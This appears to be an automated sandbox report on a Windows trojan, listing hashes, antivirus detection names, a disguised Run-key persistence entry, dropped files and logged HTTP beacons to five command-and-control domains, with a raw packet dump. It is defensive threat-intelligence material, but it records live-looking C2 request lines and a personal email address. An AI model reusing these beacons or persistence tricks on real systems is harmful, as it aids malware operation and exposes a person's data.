Analysis Date: 2015-08-19 13:23:40
MD5: 36e2da098fba36ce422eaba2d644f50c
SHA1: 1f56f75147435847b3973fc1d8b608e88dfbcc0a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 7fffd6018508ead06200ba5bf14c217f sha1: 22df6c4f6f9e3fcedbac0ef4ea051e2e2db5a618 size: 301056
Section .rdata: md5: d4608c97bc2aabe29b731a15878b32de sha1: ccc035e8b052304292860fe8588dfa268a38de27 size: 35328
Section .data: md5: 924d0fb44d18628fbf14fcad1c94c42d sha1: 72816315455444253c1ac549d139cd805a573099 size: 90624
Timestamp: 2014-10-30 10:07:49
Packer: Microsoft Visual C++ ?.?
PEhash: edbe13da617aec54bf60cfeec0d0a1773a40825b
IMPhash: 57447477bd84fac0e52646bad5db8483
AV CA (E-Trust Ino): Win32/Tnega.XAWS!suspicious
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!36E2DA098FBA
AV Avira (antivir): BDS/Zegost.Gen4
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Kryptik-PJW [Trj]
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Trojan.Gen
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: Trojan ( 004cb2771 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BJ
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TROJ_FORUCON.BMC
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader11.44890
AV F-Secure: Gen:Variant.Symmi.22722

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DCOM Adaptive Defragmenter ➝ C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\viroifmkv\dmspuuln.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.kvg
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe"

Network Details:

DNS: sweetoffice.net (Type: A) ➝ 162.213.251.173
DNS: materialsupply.net (Type: A) ➝ 184.168.221.36
DNS: laughstrong.net (Type: A) ➝ 50.21.189.209
DNS: finishstrong.net (Type: A) ➝ 50.63.202.14
DNS: sweettrouble.net (Type: A) ➝ 50.31.0.103
HTTP GET: http://sweetoffice.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
HTTP GET: http://materialsupply.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
HTTP GET: http://laughstrong.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
HTTP GET: http://finishstrong.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
HTTP GET: http://sweettrouble.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 162.213.251.173:80
Flows TCP: 192.168.1.1:1032 ➝ 184.168.221.36:80
Flows TCP: 192.168.1.1:1033 ➝ 50.21.189.209:80
Flows TCP: 192.168.1.1:1034 ➝ 50.63.202.14:80
Flows TCP: 192.168.1.1:1035 ➝ 50.31.0.103:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a616b 61625f62 61726e61   mail=jakab_barna
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 77656574   ose..Host: sweet
0x00000070 (00112)   6f666669 63652e6e 65740d0a 0d0a       office.net....

Strings